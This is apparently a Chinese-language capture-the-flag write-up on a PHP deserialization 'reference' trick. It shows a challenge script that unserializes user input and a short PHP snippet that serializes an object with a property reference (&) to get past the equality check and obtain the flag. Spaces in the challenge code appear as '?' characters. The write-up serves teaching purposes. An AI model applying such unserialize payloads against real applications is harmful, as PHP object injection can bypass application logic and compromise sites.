PHP“引用”漏洞

今日例题：

<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
class?just4fun?{
????var?$enter;
????var?$secret;
}

if?(isset($_GET['pass']))?{
????$pass?=?$_GET['pass'];
????$pass=str_replace('*','\*',$pass);
}

$o?=?unserialize($pass);

if?($o)?{
????$o->secret?=?"*";
????if?($o->secret?===?$o->enter)
????????echo?"Congratulation!?Here?is?my?secret:?".$flag;
????else
????????echo?"Oh?no...?You?can't?fool?me";
}
else?echo?"are?you?trolling?";
?>

这道题目其实很容易，其实就构造序列化字符串使enter=secret，但是secret已经写死了，变成*，我貌似只能给enter赋值*才能满足条件，但是????$pass=str_replace('*','\*',$pass);这里我只要写入*就会被替换成\,所以现在问题变成了怎么在不写入*的情况下让enter=secret，这时就要使用引用漏洞。

引用漏洞：相当于创建了一个快捷方式，可以让你去访问，但是我又不是直接去对原对象赋值。

&$a->secret这里就是一个引用，在前面加个&符号就好

?

据陈腾师傅所说，所以这道题目的关键根本不在于他们是否都是*，而是在于他们相等，只要加个&就好了

代码如下：

<?php


class just4fun{
    var $enter='*';
    var $secret;
}
$a= new just4fun();
$a->enter=&$a->secret;
echo serialize($a);

?

希望本文能够帮助大家。